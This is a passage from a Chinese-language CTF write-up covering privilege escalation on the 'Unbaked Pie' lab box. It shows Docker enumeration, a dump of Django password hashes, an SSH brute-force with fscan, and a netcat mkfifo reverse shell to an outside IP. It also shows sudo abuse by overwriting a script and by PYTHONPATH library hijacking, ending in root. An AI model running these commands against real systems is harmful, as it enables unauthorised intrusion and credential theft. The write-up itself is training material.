\u63d0\u6743<\/h2>\ndocker\u9003\u9038<\/h3>\n(remote) root@8b39a559b296:\/home# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n(remote) root@8b39a559b296:\/home# cd \/root\n(remote) root@8b39a559b296:\/root# ls -la\ntotal 36\ndrwx------ 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\n-rw------- 1 root root 805 Oct 5 2020 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 3 2020 .cache\ndrwxr-xr-x 3 root root 4096 Oct 3 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 0 Sep 24 2020 .python_history\ndrwx------ 2 root root 4096 Oct 3 2020 .ssh\n-rw-r--r-- 1 root root 254 Oct 3 2020 .wget-hsts\n(remote) root@8b39a559b296:\/root# cat .bash_history \nnc\nexit\nifconfig\nip addr\nssh 172.17.0.1\nssh 172.17.0.2\nexit\nssh ramsey@172.17.0.1\nexit\ncd \/tmp\nwget https:\/\/raw.githubusercontent.com\/moby\/moby\/master\/contrib\/check-config.sh\nchmod +x check-config.sh\n.\/check-config.sh \nnano \/etc\/default\/grub\nvi \/etc\/default\/grub\napt install vi\napt update\napt install vi\napt install vim\napt install nano\nnano \/etc\/default\/grub\ngrub-update\napt install grub-update\napt-get install --reinstall grub\ngrub-update\nexit\nssh ramsey@172.17.0.1\nexit\nssh ramsey@172.17.0.1\nexit\nls\ncd site\/\nls\ncd bakery\/\nls\nnano settings.py \nexit\nls\ncd site\/\nls\ncd bakery\/\nnano settings.py \nexit\napt remove --purge ssh\nssh\napt remove --purge autoremove open-ssh*\napt remove --purge autoremove openssh=*\napt remove --purge autoremove openssh-*\nssh\napt autoremove openssh-client\nclear\nssh\nssh\nssh\nexit\n(remote) root@8b39a559b296:\/root# cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n(remote) root@8b39a559b296:\/root# ls -la \/home\ntotal 28\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\ndrwxrwxr-x 8 root root 4096 Oct 3 2020 .git\ndrwxrwxr-x 2 root root 4096 Oct 3 2020 .vscode\n-rwxrwxr-x 1 root root 95 Oct 3 2020 requirements.sh\n-rwxrwxr-x 1 root root 46 Oct 3 2020 run.sh\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 site\n(remote) root@8b39a559b296:\/root# cd \/home\n(remote) root@8b39a559b296:\/home# cat run.sh \npython3 site\/manage.py runserver 0.0.0.0:5003<\/code><\/pre>\n\u53d1\u73b0\u4e00\u5904ramsey@172.17.0.1<\/code>\uff0c\u53ef\u80fd\u7528\u5f97\u4e0a\uff1a<\/p>\n\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\uff1a<\/p>\n(remote) root@8b39a559b296:\/home# cd \/tmp\n(remote) root@8b39a559b296:\/tmp# \n(local) pwncat$ local pwd\n\/home\/kali\/temp\/UnbakedPie\n(local) pwncat$ lcd ..\n(local) pwncat$ lpwd\n\/home\/kali\/temp\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[06:38:54] uploaded 860.55KiB in 1.80 seconds upload.py:76\n(local) pwncat$ \n(remote) root@8b39a559b296:\/tmp# chmod +x *\n(remote) root@8b39a559b296:\/tmp# .\/linpeas.sh <\/code><\/pre>\n<\/div><\/p>\n\u53d1\u73b0\u6211\u4eec\u5728\u4e00\u5904docker\u5bb9\u5668\u91cc\u9762\uff0c\u5c1d\u8bd5\u9003\u9038\uff0c\u5bfb\u627e\u76f8\u5173\u4fe1\u606f\uff0c\u53d1\u73b0\u5b58\u5728\u5f88\u591a\u7684\u6f0f\u6d1e\uff0c\u4f8b\u5982MARKDOWN_HASHc5068b7c2b1707f8939b283a2758a691MARKDOWNHASH<\/code>\u53ef\u5199\u4e4b\u7c7b\u7684\uff0c\u4f46\u662f\u5bf9\u6211\u4eec\u4e0b\u4e00\u6b65\u6ca1\u5e2e\u52a9(*\\^<\/em>^*)\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8bfb\u53d6\u4e00\u4e0b\u8fd9\u4e2a\u6570\u636e\u5e93\uff1a<\/p>\n
(remote) root@8b39a559b296:\/tmp# cd \/home\/site\n(remote) root@8b39a559b296:\/home\/site# ls -la\ntotal 184\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 1 root root 4096 Oct 3 2020 ..\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 account\ndrwxrwxr-x 8 root root 4096 Oct 3 2020 assets\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 bakery\n-rw-r--r-- 1 root root 151552 Oct 3 2020 db.sqlite3\ndrwxrwxr-x 1 root root 4096 Oct 3 2020 homepage\n-rwxrwxr-x 1 root root 662 Oct 3 2020 manage.py\ndrwxrwxr-x 2 root root 4096 Oct 3 2020 media\ndrwxrwxr-x 3 root root 4096 Oct 3 2020 templates\n(remote) root@8b39a559b296:\/home\/site# sqlite3 db.sqlite3\nbash: sqlite3: command not found<\/code><\/pre>\n\u4e0b\u8f7d\u5230\u672c\u5730\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ sqlite3 db.sqlite3 \nSQLite version 3.45.1 2024-01-30 16:01:20\nEnter ".help" for usage hints.\nsqlite> .tables\nauth_group django_admin_log \nauth_group_permissions django_content_type \nauth_permission django_migrations \nauth_user django_session \nauth_user_groups homepage_article \nauth_user_user_permissions\nsqlite> select * from auth_user\n ...> ;\n1|pbkdf2_sha256$216000$3fIfQIweKGJy$xFHY3JKtPDdn\/AktNbAwFKMQnBlrXnJyU04GElJKxEo=|2020-10-03 10:43:47.229292|1|aniqfakhrul|||1|1|2020-10-02 04:50:52.424582|\n11|pbkdf2_sha256$216000$0qA6zNH62sfo$8ozYcSpOaUpbjPJz82yZRD26ZHgaZT8nKWX+CU0OfRg=|2020-10-02 10:16:45.805533|0|testing|||0|1|2020-10-02 10:16:45.686339|\n12|pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO\/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=|2020-10-03 10:44:10.758867|0|ramsey|||0|1|2020-10-02 14:42:44.388799|\n13|pbkdf2_sha256$216000$Em73rE2NCRmU$QtK5Tp9+KKoP00\/QV4qhF3TWIi8Ca2q5gFCUdjqw8iE=|2020-10-02 14:42:59.192571|0|oliver|||0|1|2020-10-02 14:42:59.113998|\n14|pbkdf2_sha256$216000$oFgeDrdOtvBf$ssR\/aID947L0jGSXRrPXTGcYX7UkEBqWBzC+Q2Uq+GY=|2020-10-02 14:43:15.187554|0|wan|||0|1|2020-10-02 14:43:15.102863|\nsqlite> select username, password from auth_user;\naniqfakhrul|pbkdf2_sha256$216000$3fIfQIweKGJy$xFHY3JKtPDdn\/AktNbAwFKMQnBlrXnJyU04GElJKxEo=\ntesting|pbkdf2_sha256$216000$0qA6zNH62sfo$8ozYcSpOaUpbjPJz82yZRD26ZHgaZT8nKWX+CU0OfRg=\nramsey|pbkdf2_sha256$216000$hyUSJhGMRWCz$vZzXiysi8upGO\/DlQy+w6mRHf4scq8FMnc1pWufS+Ik=\noliver|pbkdf2_sha256$216000$Em73rE2NCRmU$QtK5Tp9+KKoP00\/QV4qhF3TWIi8Ca2q5gFCUdjqw8iE=\nwan|pbkdf2_sha256$216000$oFgeDrdOtvBf$ssR\/aID947L0jGSXRrPXTGcYX7UkEBqWBzC+Q2Uq+GY=<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u5bc6\u7801\uff0c\u4f46\u662f\u672a\u679c\u3002\u53c2\u8003\u58a8\u5e08\u5085\u7684blog\uff0c\u4f7f\u7528 fscan<\/code>\u5b8c\u6210ssh\u63a5\u4e0b\u6765\u7684\u5de5\u4f5c\uff1ahttps:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.8.4\/fscan.exe<\/a><\/p>\n(remote) root@8b39a559b296:\/tmp# nc -znv 172.17.0.1 22\n(UNKNOWN) [172.17.0.1] 22 (ssh) open\n(remote) root@8b39a559b296:\/tmp# nc -znv 172.17.0.1 1-65535\n(UNKNOWN) [172.17.0.1] 5003 (?) open\n(UNKNOWN) [172.17.0.1] 22 (ssh) open<\/code><\/pre>\n\u8bf4\u660e22<\/code>\u7aef\u53e3\u53ea\u5141\u8bb8\u5185\u90e8\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n(remote) root@8b39a559b296:\/tmp# \n(local) pwncat$ lcd ..\n(local) pwncat$ upload fscan\n.\/fscan \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 24.8\/24.8 MB \u2022 3.6 MB\/s \u2022 0:00:00[06:57:41] uploaded 24.76MiB in 8.24 seconds upload.py:76\n(local) pwncat$ \n(remote) root@8b39a559b296:\/tmp# chmod +x *\\\n(remote) root@8b39a559b296:\/tmp# .\/fscan -h 172.17.0.1 -user ramsey\n.\/fscan: \/lib\/x86_64-linux-gnu\/libc.so.6: version `GLIBC_2.32' not found (required by .\/fscan)\n.\/fscan: \/lib\/x86_64-linux-gnu\/libc.so.6: version `GLIBC_2.34' not found (required by .\/fscan)<\/code><\/pre>\n\u5c1d\u8bd5\u66f4\u6362\u7248\u672c\uff1ahttps:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.3.1\/fscan_amd64<\/a><\/p>\n(remote) root@8b39a559b296:\/tmp# .\/fscan_amd64 -h 172.17.0.1 -user ramsey\n\n ___ _ \n \/ _ \\ ___ ___ _ __ __ _ ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__| <\n\\____\/ |___\/\\___|_| \\__,_|\\___|_|\\_\\\nscan start\n(ICMP) Target '172.17.0.1' is alive\nicmp alive hosts len is: 1\n172.17.0.1:22 open\nSSH:172.17.0.1:22:ramsey 12345678\nscan end<\/code><\/pre>\n\u5c1d\u8bd5\u8fde\u63a5\u53cd\u5f39shell\uff01<\/p>\n
.\/fscan_amd64 -h 172.17.0.1 -user ramsey -pwd "12345678" -c "rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.10.102 1234 >\/tmp\/f"<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u8986\u76d6\u6587\u4ef6\u63d0\u6743<\/h3>\n(remote) ramsey@unbaked:\/home\/ramsey$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:110:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nramsey:x:1001:1001::\/home\/ramsey:\/bin\/bash\noliver:x:1002:1002::\/home\/oliver:\/bin\/bash\n(remote) ramsey@unbaked:\/home\/ramsey$ sudo -l\n[sudo] password for ramsey: \nMatching Defaults entries for ramsey on unbaked:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser ramsey may run the following commands on unbaked:\n (oliver) \/usr\/bin\/python \/home\/ramsey\/vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ cat \/home\/ramsey\/vuln.py\n#!\/usr\/bin\/python\n# coding=utf-8\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\nimport sys\nimport os\nimport time\n\n#Header\ndef header():\n banner = '''\\033[33m \n (\n )\n __..---..__\n ,-=' \/ | \\ `=-.\n :--..___________..--;\n \\.,_____________,.\/\n\n\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\n\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\n\u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\\033[m'''\n return banner\n\n#Function Instructions\ndef instructions():\n print "\\n\\t\\t\\t",9 * "-" , "WELCOME!" , 9 * "-"\n print "\\t\\t\\t","1. Calculator"\n print "\\t\\t\\t","2. Easy Calculator"\n print "\\t\\t\\t","3. Credits"\n print "\\t\\t\\t","4. Exit"\n print "\\t\\t\\t",28 * "-"\n\ndef instructions2():\n print "\\n\\t\\t\\t",9 * "-" , "CALCULATOR!" , 9 * "-"\n print "\\t\\t\\t","1. Add"\n print "\\t\\t\\t","2. Subtract"\n print "\\t\\t\\t","3. Multiply"\n print "\\t\\t\\t","4. Divide"\n print "\\t\\t\\t","5. Back"\n print "\\t\\t\\t",28 * "-"\n\ndef credits():\n print "\\n\\t\\tHope you enjoy learning new things - Ch4rm & H0j3n\\n"\n\n# Function Arithmetic\n\n# Function to add two numbers \ndef add(num1, num2): \n return num1 + num2 \n\n# Function to subtract two numbers \ndef subtract(num1, num2): \n return num1 - num2 \n\n# Function to multiply two numbers \ndef multiply(num1, num2): \n return num1 * num2 \n\n# Function to divide two numbers \ndef divide(num1, num2): \n return num1 \/ num2 \n# Main \nif __name__ == "__main__":\n print header()\n\n #Variables\n OPTIONS = 0\n OPTIONS2 = 0\n TOTAL = 0\n NUM1 = 0\n NUM2 = 0\n\n while(OPTIONS != 4):\n instructions()\n OPTIONS = int(input("\\t\\t\\tEnter Options >> "))\n print "\\033c"\n if OPTIONS == 1:\n instructions2()\n OPTIONS2 = int(input("\\t\\t\\tEnter Options >> "))\n print "\\033c"\n if OPTIONS2 == 5:\n continue\n else:\n NUM1 = int(input("\\t\\t\\tEnter Number1 >> "))\n NUM2 = int(input("\\t\\t\\tEnter Number2 >> "))\n if OPTIONS2 == 1:\n TOTAL = add(NUM1,NUM2)\n if OPTIONS2 == 2:\n TOTAL = subtract(NUM1,NUM2)\n if OPTIONS2 == 3:\n TOTAL = multiply(NUM1,NUM2)\n if OPTIONS2 == 4:\n TOTAL = divide(NUM1,NUM2)\n print "\\t\\t\\tTotal >> $",TOTAL\n if OPTIONS == 2:\n animation = ["[\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]","[\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0]"]\n\n print "\\r\\t\\t\\t Waiting to extract..."\n for i in range(len(animation)):\n time.sleep(0.5)\n sys.stdout.write("\\r\\t\\t\\t " + animation[i % len(animation)])\n sys.stdout.flush()\n\n LISTED = pytesseract.image_to_string(Image.open('payload.png')) \n\n TOTAL = eval(LISTED)\n print "\\n\\n\\t\\t\\tTotal >> $",TOTAL\n if OPTIONS == 3:\n credits()\n sys.exit(-1)<\/code><\/pre>\n\u867d\u7136\u770b\u4e0a\u53bb\u4e0d\u53ef\u4ee5\u4fee\u6539\uff0c\u4f46\u662f\u7531\u4e8e\u5176\u5728\u5bb6\u76ee\u5f55\u4e0b\u6240\u4ee5\u5c31\u662f\u6848\u677f\u4e0a\u7684\u8089\u4e86\uff1a<\/p>\n
(remote) ramsey@unbaked:\/home\/ramsey$ ls -la \/home\/ramsey\/vuln.py\n-rw-r--r-- 1 root ramsey 4369 Oct 3 2020 \/home\/ramsey\/vuln.py<\/code><\/pre>\n\u76f4\u63a5\u8986\u76d6\u6389\uff0c\u7136\u540e\u6267\u884c\uff01<\/p>\n
(remote) ramsey@unbaked:\/home\/ramsey$ mv vuln.py vuln.py.bak\n(remote) ramsey@unbaked:\/home\/ramsey$ echo 'import pty;pty.spawn("\/bin\/bash")' > vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ chmod +x vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ sudo -u oliver \/usr\/bin\/python \/home\/ramsey\/vuln.py\noliver@unbaked:~$ <\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h3>\noliver@unbaked:~$ sudo -l\nMatching Defaults entries for oliver on unbaked:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser oliver may run the following commands on unbaked:\n (root) SETENV: NOPASSWD: \/usr\/bin\/python \/opt\/dockerScript.py\noliver@unbaked:~$ cat \/opt\/dockerScript.py\nimport docker\n\n# oliver, make sure to restart docker if it crashes or anything happened.\n# i havent setup swap memory for it\n# it is still in development, please dont let it live yet!!!\nclient = docker.from_env()\nclient.containers.run("python-django:latest", "sleep infinity", detach=True)<\/code><\/pre>\n\u56e0\u4e3a\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\u548c\u5e93\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
oliver@unbaked:~$ cd \/tmp\noliver@unbaked:\/tmp$ echo 'import pty;pty.spawn("\/bin\/bash")' > docker.py\noliver@unbaked:\/tmp$ sudo PYTHONPATH=\/tmp python \/opt\/dockerScript.py\nroot@unbaked:\/tmp# cd \/root\nroot@unbaked:\/root# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 23 root root 4096 Oct 3 2020 ..\n-rw------- 1 root root 39 Oct 5 2020 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc\ndrwx------ 3 root root 4096 Oct 3 2020 .cache\ndrwxr-xr-x 2 root root 4096 Oct 3 2020 .nano\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 129 Oct 3 2020 root.txt\nroot@unbaked:\/root# cat root.txt \nCONGRATS ON PWNING THIS BOX!\nCreated by ch4rm & H0j3n\nps: dont be mad us, we hope you learn something new\n\nflag: Unb4ked_GOtcha!<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/nullvector0.notion.site\/unbaked-5c37935d31c240c28c4878c6c9d66c09<\/a><\/p>\n
![\"image-20240912180246579\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921141.png\")
<\/div><\/p>\n![\"image-20240912181005337\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921142.png\")
<\/div><\/p>\n![\"image-20240912181041339\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921143.png\")
<\/div><\/p>\n![\"image-20240912181338926\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921144.png\")
<\/div>![\"image-20240912181436818\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921146.png\")
<\/div>![\"image-20240912181420939\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921147.png\")
<\/div><\/p>\n![\"image-20240912183400034\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921148.png\")
<\/div><\/p>\n![\"image-20240912184002658\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921149.png\")
<\/div><\/p>\n![\"image-20240912184159571\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921150.png\")
<\/div><\/p>\n![\"image-20240912191135535\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921151.png\")
<\/div>![\"image-20240912191144759\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921152.png\")
<\/div><\/p>\n![\"image-20240912191720457\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121921153.png\")
<\/div><\/p>\n